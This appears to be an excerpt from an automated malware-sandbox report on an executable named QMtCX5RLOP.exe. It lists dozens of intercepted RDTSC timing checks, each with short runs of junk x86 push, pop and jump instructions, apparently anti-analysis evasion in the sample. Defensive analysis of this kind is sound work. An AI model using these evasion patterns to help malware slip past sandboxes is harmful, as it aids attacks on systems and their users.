Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE180 second address: 15CE186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE86E second address: 15CE873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE873 second address: 15CE89C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D01181AADh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE98E second address: 15CE994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE994 second address: 15CE998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15AEA5B second address: 15AEA71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F9D00F1DB56h 0x00000010 jng 00007F9D00F1DB56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15AEA71 second address: 15AEA8E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D01181AA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F9D01181AA8h 0x00000012 popad 0x00000013 push ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD003 second address: 15FD016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F9D00F1DB62h 0x0000000b jnl 00007F9D00F1DB56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD016 second address: 15FD039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD18E second address: 15FD192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD192 second address: 15FD1AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1AA second address: 15FD1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB65h 0x00000009 je 00007F9D00F1DB56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1C9 second address: 15FD1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1D7 second address: 15FD1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9D00F1DB5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1F1 second address: 15FD1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD331 second address: 15FD342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD342 second address: 15FD369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F9D01181AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9D01181AB8h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD369 second address: 15FD37F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9D00F1DB56h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9D00F1DB56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD37F second address: 15FD38B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD4F5 second address: 15FD4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD4F9 second address: 15FD504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD504 second address: 15FD509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD66A second address: 15FD684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD7EA second address: 15FD805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD805 second address: 15FD809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD809 second address: 15FD80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD80D second address: 15FD813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD813 second address: 15FD824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD824 second address: 15FD828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FF5B2 second address: 15FF5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB69h 0x00000009 jng 00007F9D00F1DB56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 157D216 second address: 157D21A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 157D21A second address: 157D236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9D00F1DB5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9D00F1DB56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823C5 second address: 15823CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823AD second address: 15823B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823B1 second address: 15823C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1606C11 second address: 1606C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1606C17 second address: 1606C21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 160720B second address: 1607246 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9D00F1DB60h 0x0000000a pop ecx 0x0000000b jmp 00007F9D00F1DB65h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F9D00F1DB68h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F9D00F1DB56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1607246 second address: 160724A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16067D0 second address: 16067ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16067ED second address: 16067F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 160B190 second address: 160B199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1611891 second address: 16118DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F9D01181AB6h 0x00000013 jmp 00007F9D01181AB6h 0x00000018 popad 0x00000019 jne 00007F9D01181AB2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161037C second address: 1610386 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9D00F1DB74h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16104D4 second address: 16104D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161078E second address: 1610792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161090C second address: 161092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9D01181AB1h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F9D01181AA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161092D second address: 161093F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9D00F1DB5Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A67 second address: 1610A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9D01181AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A71 second address: 1610A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A75 second address: 1610A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A7E second address: 1610A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A8B second address: 1610A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610A93 second address: 1610A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1610D7A second address: 1610D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1611027 second address: 1611039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jg 00007F9D00F1DB56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16112D8 second address: 16112DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16112DE second address: 16112E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16112E2 second address: 16112F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F9D01181AA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1614F6C second address: 1614F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1614F70 second address: 1614F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1614C99 second address: 1614CA3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16181AE second address: 16181B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16181B4 second address: 16181B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1617E6D second address: 1617E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1617E73 second address: 1617E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1617E77 second address: 1617E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F9D01181AA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1617E97 second address: 1617E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161D55B second address: 161D55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161D55F second address: 161D59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9D00F1DB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F9D00F1DB56h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F9D00F1DB60h 0x0000001c popad 0x0000001d jmp 00007F9D00F1DB60h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161D59B second address: 161D5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161D5A1 second address: 161D5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 15CE3B5 second address: 15CE3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161DDEF second address: 161DDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161DDF7 second address: 161DDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161DDFC second address: 161DE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9D00F1DB63h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161DE15 second address: 161DE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 161E995 second address: 161E9A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D00F1DB5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16221A5 second address: 16221BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 157D228 second address: 157D236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9D00F1DB56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626ABE second address: 1626AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626AC2 second address: 1626AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626231 second address: 1626235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626235 second address: 162623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162623B second address: 1626244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626381 second address: 162639E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D00F1DB68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16264E6 second address: 16264EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16264EA second address: 1626500 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D00F1DB5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626500 second address: 1626504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626504 second address: 1626513 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D00F1DB56h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1626513 second address: 1626519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EAEF second address: 162EAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EAF3 second address: 162EB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D01181AB3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EB1D second address: 162EB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EB21 second address: 162EB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EDDC second address: 162EDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162EDE4 second address: 162EDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162F9F4 second address: 162FA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9D00F1DB56h 0x0000000a jg 00007F9D00F1DB56h 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jno 00007F9D00F1DB56h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 162FA0F second address: 162FA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9D01181AA6h 0x0000000a rdtsc
